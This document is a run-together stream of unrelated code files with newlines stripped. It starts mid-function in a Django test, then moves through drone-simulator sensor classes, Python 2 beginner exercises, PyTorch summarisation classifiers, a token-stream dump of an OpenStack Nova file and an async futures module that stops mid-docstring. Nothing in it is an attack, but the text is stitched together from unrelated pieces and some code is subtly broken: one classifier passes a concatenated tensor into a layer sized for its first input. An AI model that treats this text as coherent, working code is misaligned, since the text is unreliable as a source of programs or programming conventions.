test_item_put_in_storage_after_finish(self): agents = self.hire_many_agents() product_builder = ProductBuilder() self.item.probability_per_attempt = 100 # set to 100 to ensure the item always successfully produce product_builder.item = self.item product_builder.building = self.building product_builder.agents = agents process = product_builder.produce_item() time = timezone.now() + datetime.timedelta(seconds=self.item.raw_producing_time) process.is_finished(time) self.assertEqual(self.building.storage.has_item(self.item.name), True) <reponame>embaba/swarm-rescue<gh_stars>1-10 import math import copy from collections import namedtuple import numpy as np from enum import Enum, auto from simple_playgrounds.agent.parts import MobilePlatform from simple_playgrounds.device.sensor import InternalSensor from simple_playgrounds.device.sensors import Lidar, SemanticCones, Touch, Position, Velocity from simple_playgrounds.element.elements.activable import VendingMachine from simple_playgrounds.element.elements.basic import Wall from simple_playgrounds.element.elements.contact import Candy from simple_playgrounds.element.elements.gem import Coin from spg_overlay.normal_wall import NormalWall, NormalBox from spg_overlay.rescue_center import RescueCenter from spg_overlay.utils import deg2rad from spg_overlay.wounded_person import WoundedPerson class DroneLidar(Lidar): """ It emulates a lidar. Lidar is an acronym of "light detection and ranging". It is a real sensor that measures distances with a laser in different directions. - fov (field of view): 180 degrees - resolution (number of rays): 180 - max range (maximum range of the sensor): 300 pix """ def __init__(self, **kwargs): resolution = 90 std_dev_noise = 2.5 super().__init__(normalize=False, resolution=resolution, max_range=300, fov=360, noise_params={"type": "gaussian", "mean": 0, "scale": std_dev_noise}, **kwargs) self.size = resolution a = self.fov_rad() / (self.size - 1) b = self.fov_rad() / 2 if self.size == 1: self.ray_angles = [0.] else: self.ray_angles = [n * a - b for n in range(self.size)] # 'ray_angles' is an array which contains the angles of the laser rays of the lidar self.ray_angles = np.array(self.ray_angles) def fov_rad(self): """Field of view in radians""" return self._fov def fov_deg(self): """ Field of view in degrees""" return self._fov * 180 / math.pi def get_sensor_values(self): """Get values of the lidar as a numpy array""" self.sensor_values = np.reshape(self.sensor_values, (len(self.sensor_values),)) return self.sensor_values @property def resolution(self): """resolution : number of rays """ return self._resolution @property def min_range(self): """min_range : min distance given by the lidar """ return self._min_range @property def max_range(self): """min_range : max distance given by the lidar """ return self._max_range def is_disabled(self): return self._disabled class DroneTouch(Touch): """ Touch sensor detects close proximity of entities (objects or walls) near the drone. It emulates artificial skin, - *fov* (field of view): 360 degrees - *resolution* (number of rays): 36 - *max range* (maximum range of the sensor): 5 pix The return value is between 0 and 1. """ def __init__(self, **kwargs): std_dev_noise = 0.01 super().__init__(normalize=True, fov=360, max_range=5, resolution=12, noise_params={"type": "gaussian", "mean": 0, "scale": std_dev_noise}, **kwargs) def is_disabled(self): return self._disabled class DroneSemanticCones(SemanticCones): """ Semantic Cones sensors allow to determine the nature of an object, without data processing, around the drone. - fov (field of view): 360 degrees - max range (maximum range of the sensor): 200 pix - n_cones, number of cones evenly spaced across the field of view: 36 """ class TypeEntity(Enum): """ Type of the entity detected """ WALL = auto() WOUNDED_PERSON = auto() GRASPED_WOUNDED_PERSON = auto() RESCUE_CENTER = auto() CANDY = auto() DRONE = auto() COIN = auto() VENDING_MACHINE = auto() OTHER = auto() Data = namedtuple("Data", "distance angle entity_type grasped") def __init__(self, **kwargs): # We use a gaussian noise, but only for the distance. We need to declare noise_params # we will do our own computation for the noise in the overload function _apply_noise() noise_params = {"type": "gaussian", "mean": 0, "scale": 0} super().__init__(normalize=False, n_cones=36, rays_per_cone=4, max_range=200, fov=360, noise_params=noise_params, **kwargs) def _compute_raw_sensor(self, playground, *_): super()._compute_raw_sensor(playground) for index, detection in enumerate(self.sensor_values): if isinstance(detection.entity, Wall): entity_type = self.TypeEntity.WALL elif isinstance(detection.entity, NormalWall): entity_type = self.TypeEntity.WALL elif isinstance(detection.entity, NormalBox): entity_type = self.TypeEntity.WALL elif isinstance(detection.entity, WoundedPerson): entity_type = self.TypeEntity.WOUNDED_PERSON elif isinstance(detection.entity, RescueCenter): entity_type = self.TypeEntity.RESCUE_CENTER elif isinstance(detection.entity, Candy): entity_type = self.TypeEntity.CANDY elif isinstance(detection.entity, Coin): entity_type = self.TypeEntity.COIN elif isinstance(detection.entity, VendingMachine): entity_type = self.TypeEntity.VENDING_MACHINE elif isinstance(detection.entity, MobilePlatform): entity_type = self.TypeEntity.DRONE else: entity_type = self.TypeEntity.OTHER # print(__file__, type(detection.entity)) grasped = False if detection.entity.graspable and len(detection.entity.held_by) > 0: grasped = True new_detection = self.Data(distance=detection.distance, angle=detection.angle, entity_type=entity_type, grasped=grasped) self.sensor_values[index] = new_detection def _apply_noise(self): std_dev_noise = 2.5 for index, data in enumerate(self.sensor_values): new_data = self.Data(distance=max(0.0, data.distance + np.random.normal(std_dev_noise)), angle=data.angle, entity_type=data.entity_type, grasped=data.grasped) self.sensor_values[index] = new_data def is_disabled(self): return self._disabled class DroneGPS(InternalSensor): """ DroneGPS Sensor returns a numpy array containing the position of the anchor. """ def __init__(self, **kwargs): # In reality, we dont use a gaussian noise, for the moment we need to do this # to fool the system into using our own noise in the overload function _apply_noise(). noise_params = {"type": "gaussian", "mean": 0, "scale": 0} super().__init__(noise_params=noise_params, **kwargs) self.model_param = 0.95 # std_dev is the real standard deviation of the resulted noise self.std_dev = 15 # _std_dev_wn is the standard deviation of the white noise self._std_dev_wn = math.sqrt(self.std_dev ** 2 * (1 - self.model_param ** 2)) self._last_noise = None def _get_null_sensor(self): null_sensor = np.empty(self.shape) null_sensor[:] = np.nan return null_sensor def _compute_raw_sensor(self, playground, *_): self.sensor_values = np.array(self._anchor.position) def set_playground_size(self, size): self._pg_size = size def _apply_normalization(self): self.sensor_values /= (self._pg_size[0], self._pg_size[1]) @property def shape(self): return (2,) def _apply_noise(self): """ Overload of an internal function of _apply_noise of the class InternalSensor We use a noise that follow an autoregressive model of order 1 : https://en.wikipedia.org/wiki/Autoregressive_model#AR(1) """ white_noise = np.random.normal(0, (self._std_dev_wn, self._std_dev_wn), size=self.shape) if self._last_noise is None: self._last_noise = np.zeros(self.shape) additive_noise = self.model_param * self._last_noise + white_noise self._last_noise = additive_noise self.sensor_values += additive_noise def is_disabled(self): return self._disabled class DroneCompass(InternalSensor): """ DroneCompass Sensor returns a numpy array containing the orientation of the anchor. """ def __init__(self, **kwargs): # In reality, we dont use a gaussian noise, for the moment we need to do this # to fool the system into using our own noise in the overload function _apply_noise(). noise_params = {"type": "gaussian", "mean": 0, "scale": 0} super().__init__(noise_params=noise_params, **kwargs) self.model_param = 0.95 # std_dev_angle is the real standard deviation of the resulted noise self.std_dev_angle = deg2rad(4) # _std_dev_angle_wn is the standard deviation of the white noise self._std_dev_angle_wn = math.sqrt(self.std_dev_angle ** 2 * (1 - self.model_param ** 2)) self._last_noise = None def _get_null_sensor(self): null_sensor = np.empty(self.shape) null_sensor[:] = np.nan return null_sensor def _compute_raw_sensor(self, playground, *_): self.sensor_values = np.array([self._anchor.angle]) def _apply_normalization(self): self.sensor_values /= 2 * math.pi @property def shape(self): return (1,) def _apply_noise(self): """ Overload of an internal function of _apply_noise of the class InternalSensor We use a noise that follow an autoregressive model of order 1 : https://en.wikipedia.org/wiki/Autoregressive_model#AR(1) """ white_noise = np.random.normal(0, self._std_dev_angle_wn, size=self.shape) if self._last_noise is None: self._last_noise = np.zeros(self.shape) additive_noise = self.model_param * self._last_noise + white_noise self._last_noise = additive_noise self.sensor_values += additive_noise def is_disabled(self): return self._disabled class DroneVelocity(Velocity): """ DroneVelocity Sensor returns a numpy array containing the velocity of the anchor. """ def __init__(self, **kwargs): # std_dev_velocity is the standard deviation of the gaussian noise for the longitudinal velocity self.std_dev_velocity = 0.08 # std_dev_angular_velocity is the real standard deviation of the resulted noise self.std_dev_angular_velocity = deg2rad(0.15) noise_params = {"type": "gaussian", "mean": [0, 0, 0], "scale": [self.std_dev_velocity, self.std_dev_velocity, self.std_dev_angular_velocity]} super().__init__(noise_params=noise_params, **kwargs) import sqlite3 con_obj = sqlite3.connect("test.db") with con_obj: cur_obj = con_obj.cursor() cur_obj.execute("""CREATE TABLE books(title text, author text)""") print ("Table created") import os THIS_DIR = os.path.abspath(os.path.dirname(__file__)) PROJECT_DIR = os.path.abspath(os.path.join(THIS_DIR, "..")) DATA_DIR = os.path.join(PROJECT_DIR, "data") os.makedirs(DATA_DIR, exist_ok=True) DATA_JSON = os.path.join(DATA_DIR, "rt-polarity.json") DATA_URL = ( "http://www.cs.cornell.edu/people/pabo/movie-review-data/rt-polaritydata.tar.gz" ) S3_BUCKET = os.environ.get("PROJECT_BUCKET") if S3_BUCKET is None: raise EnvironmentError("PROJECT_BUCKET environment variable not set") MODEL_S3_FILE = os.path.join(S3_BUCKET, "model.h5") MODEL_FILE = os.path.join(DATA_DIR, "model.h5") TOKENIZER_PICKLE = os.path.join(DATA_DIR, "tokenizer.pickle") TOKENIZER_S3_PICKLE = os.path.join(S3_BUCKET, "tokenizer.pickle") <filename>problems.py # Problems def is_even(x): if x % 2 == 0: return True else: return False print is_even(26572) #-------------------------------- def is_int(x): absolute = abs(x) rounded = round(absolute) return absolute - rounded == 0 print is_int(10) print is_int(10.5) #-------------------------------- # summing the digits of a number number = 123129 def digit_sum(n): result = sum(int(digit) for digit in str(n)) return result print digit_sum(number) #-------------------------------- # factorial [recursion] def factorial(x): if x == 1: return 1 else: return (x * factorial(x-1)) num = 9 result = factorial(num) print ("The factorial of", num, "is", result) #-------------------------------- # is_prime def is_prime(x): if x < 2: return False else: for n in range(2, x-1): # Start from 2 finish at x minus 1 if x % n == 0: return False return True print is_prime(13) print is_prime(10) #-------------------------------- # reverse def reverse(text): word = "" l = len(text) - 1 while l >= 0: word = word + text[l] l -= 1 return word print reverse("Hello") #-------------------------------- # anti_vowel def anti_vowel(text): result = "" vowels = "ieaouIEAOU" for char in text: if char not in vowels: result += char return result print anti_vowel("Borrow book please sir") #-------------------------------- score = {"a": 1, "c": 3, "b": 3, "e": 1, "d": 2, "g": 2, "f": 4, "i": 1, "h": 4, "k": 5, "j": 8, "m": 3, "l": 1, "o": 1, "n": 1, "q": 10, "p": 3, "s": 1, "r": 1, "u": 1, "t": 1, "w": 4, "v": 4, "y": 4, "x": 8, "z": 10} def scrabble_score(word): word = word.lower() total = 0 for letter in word: for leter in score: if letter == leter: total = total + score[leter] return total print scrabble_score("piZZa") <reponame>nju-websoft/SR3 import math import torch import torch.nn as nn from others.neural import MultiHeadedAttention, PositionwiseFeedForward class Classifier(nn.Module): def __init__(self, hidden_size): super(Classifier, self).__init__() self.linear1 = nn.Linear(hidden_size, 1) self.sigmoid = nn.Sigmoid() def forward(self, x, mask_cls): h = self.linear1(x).squeeze(-1) sent_scores = self.sigmoid(h) * mask_cls.float() return sent_scores class ClassifierExt(nn.Module): def __init__(self, hidden_size): super(ClassifierExt, self).__init__() self.linear1 = nn.Linear(hidden_size*3, hidden_size) self.dropout=torch.nn.Dropout(0.5) self.relu= nn.ReLU(inplace=True) self.linear2 = nn.Linear(hidden_size,1) self.softmax = nn.Softmax(dim=-1) def forward(self, x, mask_cls): h = self.linear1(x) h= self.relu(h) h= self.dropout(h) h = self.linear2(h).squeeze(-1) sent_scores = self.softmax(h) * mask_cls.float() return sent_scores class ClassifierExtWithBefore(nn.Module): def __init__(self, hidden_size): super(ClassifierExtWithBefore, self).__init__() self.linear1 = nn.Linear(hidden_size * 3, hidden_size) self.dropout = torch.nn.Dropout(0.5) self.relu = nn.ReLU(inplace=True) self.linear2 = nn.Linear(hidden_size * 2, hidden_size) self.linear3 = nn.Linear(hidden_size, 1) self.softmax = nn.Softmax(dim=-1) def forward(self, x, mask_cls): sent_scores_feature = self.linear1(x) # batch_size,decode_step,ext_size,hidden_size before_sent_feature = [torch.zeros([sent_scores_feature.size(0),sent_scores_feature.size(2),sent_scores_feature.size(3)],device=sent_scores_feature.device)] for i in range(1, sent_scores_feature.size(1)): sent_score_before = torch.max(sent_scores_feature[:, :i, :, :], dim=1)[0] before_sent_feature.append(sent_score_before) before_sent_feature = torch.stack(before_sent_feature, dim=1) cur_sent_feature = torch.cat([sent_scores_feature, before_sent_feature], dim=-1) cur_sent_feature = self.linear2(cur_sent_feature) cur_sent_feature = self.dropout(self.relu(cur_sent_feature)) cur_sent_feature = self.linear3(cur_sent_feature).squeeze(-1) sent_scores = self.softmax(cur_sent_feature) * mask_cls.float() return sent_scores def predict(self,x, mask_cls,before_sent_feature): sent_scores_feature = self.linear1(x) # batch_size,decode_step,ext_size,hidden_size cur_sent_feature = torch.cat([sent_scores_feature, before_sent_feature], dim=-1) before_sent_feature=torch.where(before_sent_feature>sent_scores_feature,before_sent_feature,sent_scores_feature) cur_sent_feature = self.linear2(cur_sent_feature) cur_sent_feature = self.dropout(self.relu(cur_sent_feature)) cur_sent_feature = self.linear3(cur_sent_feature).squeeze(-1) sent_scores = self.softmax(cur_sent_feature) * mask_cls.float() return sent_scores,before_sent_feature class ClassifierExtWithBeforeScore(nn.Module): def __init__(self, hidden_size): super(ClassifierExtWithBeforeScore, self).__init__() self.linear1 = nn.Linear(hidden_size*3, hidden_size) self.dropout=torch.nn.Dropout(0.5) self.relu= nn.ReLU(inplace=True) self.linear2 = nn.Linear(hidden_size,1) self.linear3 = nn.Linear(3,128) self.linear4 = nn.Linear(3,1) self.softmax = nn.Softmax(dim=-1) def forward_old(self, x, mask_cls): h = self.linear1(x) h = self.relu(h) h = self.dropout(h) h = self.linear2(h).squeeze(-1) sent_scores = self.softmax(h) * mask_cls.float() # batch_size,decode_step,ext_size max_score=torch.zeros([sent_scores.size(0),sent_scores.size(-1)],dtype=torch.float).to(x.device).unsqueeze(-1) # print(sent_scores.size()) # print(max_score.size()) index = torch.arange(0,sent_scores.size(-1),dtype=torch.float).unsqueeze(0).expand(sent_scores.size(0),-1).to(x.device).unsqueeze(-1) final_score=[] for i in range(0, sent_scores.size(1)): score_step=sent_scores.select(1,i).unsqueeze(-1) # print(index.size(),score_step.size(),max_score.size()) score_step_concat=torch.cat([index,score_step,max_score],dim=-1) # print(score_step_concat.size()) score_step=self.linear4(self.dropout(self.relu(self.linear3(score_step_concat)))) score_step = (self.softmax(score_step.squeeze(-1)) * mask_cls.float()).unsqueeze(-1) # print(score_step.size()) final_score.append(score_step) max_score=torch.where(max_score>score_step,max_score,score_step) sent_scores=torch.stack(final_score,dim=1).squeeze(-1) # sent_scores = self.softmax(sent_scores) * mask_cls.float() return sent_scores def forward(self, x, mask_cls): h = self.linear1(x) h = self.relu(h) h = self.dropout(h) h = self.linear2(h).squeeze(-1) sent_scores=h # sent_scores = self.softmax(h) * mask_cls.float() # batch_size,decode_step,ext_size max_score = torch.zeros([sent_scores.size(0), sent_scores.size(-1)], dtype=torch.float).to(x.device) # print(sent_scores.size()) # print(max_score.size()) index = torch.arange(0, sent_scores.size(-1), dtype=torch.float).unsqueeze(0).unsqueeze(0).expand(sent_scores.size(0),sent_scores.size(1), -1).to(x.device) index[index > 0] = 1 max_scores = [max_score] # print(sent_scores.size()) for i in range(1, sent_scores.size(1)): # print(sent_scores[:, :i, :]) # print(torch.max(sent_scores[:, :i, :], dim=1)) sent_score_before = torch.max(sent_scores[:, :i, :], dim=1)[0] max_scores.append(sent_score_before) max_scores=torch.stack(max_scores,dim=1) score_step_concat = torch.cat([index.unsqueeze(-1), sent_scores.unsqueeze(-1), (1-max_scores).unsqueeze(-1)], dim=-1) # final_score = self.linear4(self.dropout(self.relu(self.linear3(score_step_concat)))).squeeze(-1) final_score = self.linear4(score_step_concat).squeeze(-1) sent_scores = self.softmax(final_score) * mask_cls.float() return sent_scores def predict(self,x, mask_cls,max_score): h = self.linear1(x) h = self.relu(h) h = self.dropout(h) h = self.linear2(h).squeeze(-1) sent_scores = h # sent_scores = self.softmax(h) * mask_cls.float() # batch_size,decode_step,ext_size index = torch.arange(0, sent_scores.size(-1),dtype=torch.float).unsqueeze(0).expand(sent_scores.size(0),-1).to(x.device) index[index>0]=1 # print(max_score.size(),index.size(),sent_scores.size()) score_step_concat = torch.cat([index.unsqueeze(-1), sent_scores.unsqueeze(-1), (1-max_score)],dim=-1) # final_score = self.linear4(self.dropout(self.relu(self.linear3(score_step_concat)))) final_score = self.linear4(score_step_concat) # print(max_score.size(),sent_scores.size()) max_score = torch.where(max_score > sent_scores.unsqueeze(-1), max_score, sent_scores.unsqueeze(-1)) sent_scores = self.softmax(final_score.squeeze(-1)) * mask_cls.float() return sent_scores,max_score def predict_old(self,x, mask_cls,max_score): h = self.linear1(x) h = self.relu(h) h = self.dropout(h) h = self.linear2(h).squeeze(-1) sent_scores = self.softmax(h) * mask_cls.float() # batch_size,decode_step,ext_size index = torch.arange(0, sent_scores.size(-1),dtype=torch.float).unsqueeze(0).expand(sent_scores.size(0),-1).to(x.device) # print(max_score.size(),index.size(),sent_scores.size()) score_step_concat = torch.cat([index.unsqueeze(-1), sent_scores.unsqueeze(-1), max_score],dim=-1) score_step = self.linear4(self.dropout(self.relu(self.linear3(score_step_concat)))) sent_scores = self.softmax(score_step.squeeze(-1)) * mask_cls.float() max_score = torch.where(max_score > sent_scores.unsqueeze(-1), max_score, sent_scores.unsqueeze(-1)) return sent_scores,max_score class ClassifierSourceType(nn.Module): def __init__(self, hidden_size): super(ClassifierSourceType, self).__init__() self.linear1=nn.Linear(1,hidden_size) self.linear2 = nn.Linear(hidden_size*2, 1) self.sigmoid = nn.Sigmoid() def forward(self, x, mask_cls,source_type): h1 = self.linear1(source_type) h2 = torch.cat([x,h1],-1) h = self.linear1(h2).squeeze(-1) sent_scores = self.sigmoid(h) * mask_cls.float() return sent_scores class PositionalEncoding(nn.Module): def __init__(self, dropout, dim, max_len=5000): pe = torch.zeros(max_len, dim) position = torch.arange(0, max_len).unsqueeze(1) div_term = torch.exp((torch.arange(0, dim, 2, dtype=torch.float) * -(math.log(10000.0) / dim))) pe[:, 0::2] = torch.sin(position.float() * div_term) pe[:, 1::2] = torch.cos(position.float() * div_term) pe = pe.unsqueeze(0) super(PositionalEncoding, self).__init__() self.register_buffer('pe', pe) self.dropout = nn.Dropout(p=dropout) self.dim = dim def forward(self, emb, step=None): emb = emb * math.sqrt(self.dim) try: # print(self.pe) # print(step) x=torch.index_select(self.pe,1,step).squeeze(0).unsqueeze(1) # print('emb:',emb.size()) # print(torch.index_select(self.pe,1,step).size()) # print(self.pe[:, 1].size()) emb = emb + x # print(emb.size()) except Exception as e: # print(e) if(step): emb = emb + self.pe[:, step][:, None, :] else: emb = emb + self.pe[:, :emb.size(1)] emb = self.dropout(emb) return emb def get_emb(self, emb): return self.pe[:, :emb.size(1)] class TransformerEncoderLayer(nn.Module): def __init__(self, d_model, heads, d_ff, dropout): super(TransformerEncoderLayer, self).__init__() self.self_attn = MultiHeadedAttention( heads, d_model, dropout=dropout) self.feed_forward = PositionwiseFeedForward(d_model, d_ff, dropout) self.layer_norm = nn.LayerNorm(d_model, eps=1e-6) self.dropout = nn.Dropout(dropout) def forward(self, iter, query, inputs, mask): if (iter != 0): input_norm = self.layer_norm(inputs) else: input_norm = inputs mask = mask.unsqueeze(1) context,_ = self.self_attn(input_norm, input_norm, input_norm, mask=mask) out = self.dropout(context) + inputs return self.feed_forward(out) class ExtTransformerEncoder(nn.Module): def __init__(self, d_model, d_ff, heads, dropout, num_inter_layers=0): super(ExtTransformerEncoder, self).__init__() self.d_model = d_model self.num_inter_layers = num_inter_layers self.pos_emb = PositionalEncoding(dropout, d_model) self.transformer_inter = nn.ModuleList( [TransformerEncoderLayer(d_model, heads, d_ff, dropout) for _ in range(num_inter_layers)]) self.dropout = nn.Dropout(dropout) self.layer_norm = nn.LayerNorm(d_model, eps=1e-6) self.wo = nn.Linear(d_model, 1, bias=True) self.sigmoid = nn.Sigmoid() def forward(self, top_vecs, mask): """ See :obj:`EncoderBase.forward()`""" batch_size, n_sents = top_vecs.size(0), top_vecs.size(1) pos_emb = self.pos_emb.pe[:, :n_sents] x = top_vecs * mask[:, :, None].float() x = x + pos_emb for i in range(self.num_inter_layers): x = self.transformer_inter[i](i, x, x, ~mask) # x = self.transformer_inter[i](i, x, x, 1 - mask) # all_sents * max_tokens * dim x = self.layer_norm(x) sent_scores = self.sigmoid(self.wo(x)) sent_scores = sent_scores.squeeze(-1) * mask.float() return sent_scores class ExtTransformerEncoderSourceType(nn.Module): def __init__(self, d_model, d_ff, heads, dropout, num_inter_layers=0): super(ExtTransformerEncoderSourceType, self).__init__() self.d_model = d_model self.num_inter_layers = num_inter_layers self.pos_emb = PositionalEncoding(dropout, d_model) self.transformer_inter = nn.ModuleList( [TransformerEncoderLayer(d_model, heads, d_ff, dropout) for _ in range(num_inter_layers)]) self.dropout = nn.Dropout(dropout) self.layer_norm = nn.LayerNorm(d_model, eps=1e-6) self.ls = nn.Embedding(6,d_model) self.wo = nn.Linear(d_model*2, 1, bias=True) self.sigmoid = nn.Sigmoid() def forward(self, top_vecs, mask,source_type): """ See :obj:`EncoderBase.forward()`""" batch_size, n_sents = top_vecs.size(0), top_vecs.size(1) pos_emb = self.pos_emb.pe[:, :n_sents] x = top_vecs * mask[:, :, None].float() x = x + pos_emb for i in range(self.num_inter_layers): x = self.transformer_inter[i](i, x, x, ~mask) # x = self.transformer_inter[i](i, x, x, 1 - mask) # all_sents * max_tokens * dim x = self.layer_norm(x) h1 = self.ls(source_type) sent_scores = self.sigmoid(self.wo(torch.cat([x,h1],-1))) sent_scores = sent_scores.squeeze(-1) * mask.float() return sent_scores <gh_stars>0 import pandas as pd import plotly.express as px f = pd.read_csv('csv files/data.csv') graph = px.scatter(f, x="Population", y = "Per capita", size = "Percentage", color = "Country") graph.show()<filename>nova/objects/hv_spec.py<gh_stars>0 begin_unit comment|'# Copyright (c) 2014 Hewlett-Packard Development Company, L.P.' nl|'\n' comment|'# All Rights Reserved.' nl|'\n' comment|'#' nl|'\n' comment|'# Licensed under the Apache License, Version 2.0 (the "License"); you may' nl|'\n' comment|'# not use this file except in compliance with the License. You may obtain' nl|'\n' comment|'# a copy of the License at' nl|'\n' comment|'#' nl|'\n' comment|'# http://www.apache.org/licenses/LICENSE-2.0' nl|'\n' comment|'#' nl|'\n' comment|'# Unless required by applicable law or agreed to in writing, software' nl|'\n' comment|'# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT' nl|'\n' comment|'# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the' nl|'\n' comment|'# License for the specific language governing permissions and limitations' nl|'\n' comment|'# under the License.' nl|'\n' nl|'\n' name|'from' name|'oslo_utils' name|'import' name|'versionutils' newline|'\n' nl|'\n' name|'from' name|'nova' op|'.' name|'compute' name|'import' name|'hv_type' newline|'\n' name|'from' name|'nova' op|'.' name|'objects' name|'import' name|'base' newline|'\n' name|'from' name|'nova' op|'.' name|'objects' name|'import' name|'fields' newline|'\n' nl|'\n' nl|'\n' op|'@' name|'base' op|'.' name|'NovaObjectRegistry' op|'.' name|'register' newline|'\n' DECL|class|HVSpec name|'class' name|'HVSpec' op|'(' name|'base' op|'.' name|'NovaObject' op|')' op|':' newline|'\n' comment|'# Version 1.0: Initial version' nl|'\n' comment|"# Version 1.1: Added 'vz' hypervisor" nl|'\n' comment|"# Version 1.2: Added 'lxd' hypervisor" nl|'\n' DECL|variable|VERSION indent|' ' name|'VERSION' op|'=' string|"'1.2'" newline|'\n' nl|'\n' DECL|variable|fields name|'fields' op|'=' op|'{' nl|'\n' string|"'arch'" op|':' name|'fields' op|'.' name|'ArchitectureField' op|'(' op|')' op|',' nl|'\n' string|"'hv_type'" op|':' name|'fields' op|'.' name|'HVTypeField' op|'(' op|')' op|',' nl|'\n' string|"'vm_mode'" op|':' name|'fields' op|'.' name|'VMModeField' op|'(' op|')' op|',' nl|'\n' op|'}' newline|'\n' nl|'\n' comment|'# NOTE(pmurray): for backward compatibility, the supported instance' nl|'\n' comment|'# data is stored in the database as a list.' nl|'\n' op|'@' name|'classmethod' newline|'\n' DECL|member|from_list name|'def' name|'from_list' op|'(' name|'cls' op|',' name|'data' op|')' op|':' newline|'\n' indent|' ' name|'return' name|'cls' op|'(' name|'arch' op|'=' name|'data' op|'[' number|'0' op|']' op|',' nl|'\n' name|'hv_type' op|'=' name|'data' op|'[' number|'1' op|']' op|',' nl|'\n' name|'vm_mode' op|'=' name|'data' op|'[' number|'2' op|']' op|')' newline|'\n' nl|'\n' DECL|member|to_list dedent|'' name|'def' name|'to_list' op|'(' name|'self' op|')' op|':' newline|'\n' indent|' ' name|'return' op|'[' name|'self' op|'.' name|'arch' op|',' name|'self' op|'.' name|'hv_type' op|',' name|'self' op|'.' name|'vm_mode' op|']' newline|'\n' nl|'\n' DECL|member|obj_make_compatible dedent|'' name|'def' name|'obj_make_compatible' op|'(' name|'self' op|',' name|'primitive' op|',' name|'target_version' op|')' op|':' newline|'\n' indent|' ' name|'super' op|'(' name|'HVSpec' op|',' name|'self' op|')' op|'.' name|'obj_make_compatible' op|'(' name|'primitive' op|',' name|'target_version' op|')' newline|'\n' name|'target_version' op|'=' name|'versionutils' op|'.' name|'convert_version_to_tuple' op|'(' name|'target_version' op|')' newline|'\n' name|'if' op|'(' name|'target_version' op|'<' op|'(' number|'1' op|',' number|'1' op|')' name|'and' string|"'hv_type'" name|'in' name|'primitive' name|'and' nl|'\n' name|'hv_type' op|'.' name|'VIRTUOZZO' op|'==' name|'primitive' op|'[' string|"'hv_type'" op|']' op|')' op|':' newline|'\n' indent|' ' name|'primitive' op|'[' string|"'hv_type'" op|']' op|'=' name|'hv_type' op|'.' name|'PARALLELS' newline|'\n' dedent|'' dedent|'' dedent|'' endmarker|'' end_unit <filename>py/garage/garage/asyncs/futures.py """ Future objects that represent one-shot caller-callee contract. A caller will hold a Future object and its callee will hold a Promise object. Direct caller-callee relationship where a caller has direct reference to its callee should be modelled by normal function call or task spawning. Future objects should be for indirect caller-callee relationship; for example, a caller submits jobs to a worker pool and cannot be certain which worker will be performing the job, and in this case we should use Future objects to model the caller-callee relationship. """ __all__ = [ 'CancelledError', 'DeferredFuture', 'Future', 'FutureAdapter', ] from concurrent.futures import CancelledError import enum import curio.traps from garage.assertions import ASSERT from . import base class State(enum.Enum): PENDING = 'PENDING' RUNNING = 'RUNNING' CANCELLED = 'CANCELLED' FINISHED = 'FINISHED' class Future: """Future object, which is for the caller-side of the contract. NOTE: The interface of Future class is still different from that of concurrent.futures.Future, but we try to make them as close as possible/practical. """ # You should not construct Promise objects directly, and should call # Future.make_promise to get Promise objects. class Promise: """Promise object, which is for the callee-side of the contract. NOTE: Interface of the Promise object is not asynchronous; meaning that you may use it outside of an event loop (say, in a work thread performing blocking operations). """ def __init__(self, future): self._future = future # # Use context manager to express promise holder's intent to: # * Start working on the job # * Capture exception automatically # # The usage is usually like: # try: # with promise: # promise.set_result(...) # except futures.CancelledError: # pass # except Exception: # ... # Log error # async def __aenter__(self): return self.__enter__() async def __aexit__(self, *args): return self.__exit__(*args) def __enter__(self): if not self.set_running_or_notify_cancel(): raise CancelledError return self def __exit__(self, exc_type, exc, tb): # This is subtly annoying: If after set_result() and before # leaving the block, an exception is raised, it will not be # captured because the promise has been fulfilled already. # Anyway, if you always do promise.set_result() at the very # end, you should be fine. if exc_type: if (not self._future.done() and # We should only capture "true" errors (not issubclass(exc_type, BaseException) or issubclass(exc_type, Exception))): self.set_exception(exc) # Although the exception is captured, to be consistent # on all code paths we will not suppress the exception, # i.e., don't return True here else: if not self._future.done(): import warnings warnings.warn('promise has not been fulfilled: %r' % self) # It's usually a good idea that you check whether the job has # been cancelled before starting it. def set_running_or_notify_cancel(self): if self._future._state is State.CANCELLED: return False elif self._future._state is State.PENDING: self._future._state = State.RUNNING return True else: raise AssertionError( 'Future is in unexpected state: %r' % self._future._state) def cancelled(self): return self._future.cancelled() def _set(self, result, exception): if self._future._state is State.CANCELLED: return ASSERT.is_not(self._future._state, State.FINISHED) ASSERT.false(self._future.done()) ASSERT.false(self._future._done.is_set()) self._future._result = result self._future._exception = exception self._future._state = State.FINISHED self._future._done.set() def set_result(self, result): self._set(result, None) def set_exception(self, exception): self._set(None, exception) def __init__(self): # Set when state is transition to CANCELED or FINISHED self._done = base.Event() self._state = State.PENDING self._result = None self._exception = None # Use the context manager to express that the future holder doesn't # care about the result once he leaves this block async def __aenter__(self): return self async def __aexit__(self, *_): self.cancel() def running(self): return self._state is State.RUNNING def cancelled(self): return self._state is State.CANCELLED def done(self): return self._state in (State.CANCELLED, State.FINISHED) def promise(self): # Future won't reference to Promise to avoid cyclic reference. return Future.Promise(self) def cancel(self): """Notify the Promise holder that the Future holder is not interested in the result anymore. Return True if the future is/was actually cancelled. """ if self._state is State.PENDING: self._state = State.CANCELLED self._done.set() return True elif self._state is State.RUNNING: return False elif self._state is State.CANCELLED: ASSERT.true(self._done.is_set()) return True else: ASSERT.is_(self._state, State.FINISHED) ASSERT.true(self._done.is_set()) return False async def result(self): await self._done.wait() ASSERT.true(self.done()) if self._state is State.CANCELLED: raise CancelledError elif self._exception is not None: raise self._exception else: return self._result async def exception(self): await self._done.wait() ASSERT.true(self.done()) if self._state is State.CANCELLED: raise CancelledError else: return self._exception class FutureAdapter: """An asynchronous interface adapter for a concurrent.futures.Future objects. """ def __init__(self, future): self._future = future async def __aenter__(self): return self async def __aexit__(self, *_): self.cancel() def running(self): return self._future.running() def cancelled(self): return self._future.cancelled() def done(self): return self._future.done() def cancel(self): return self._future.cancel() async def result(self): if not self._future.done(): await curio.traps._future_wait(self._future) return self._future.result() async def exception(self): if not self._future.done(): await curio.traps._future_wait(self._future) return self._future.exception() class DeferredFuture: """Represent deferred computation. Unlike Future, DeferredFuture is not for split work across tasks, as it execute the computation on the same task, but is designed for two purposes: * Defer and evaluate a computation lazily (duh!). * You want to provide Future-esque interface but do not want to spawn and manage new tasks. """ @classmethod def wrap(cls, coro_func): """Wrap a coroutine function (a function that generates coroutine, not a coroutine itself) that 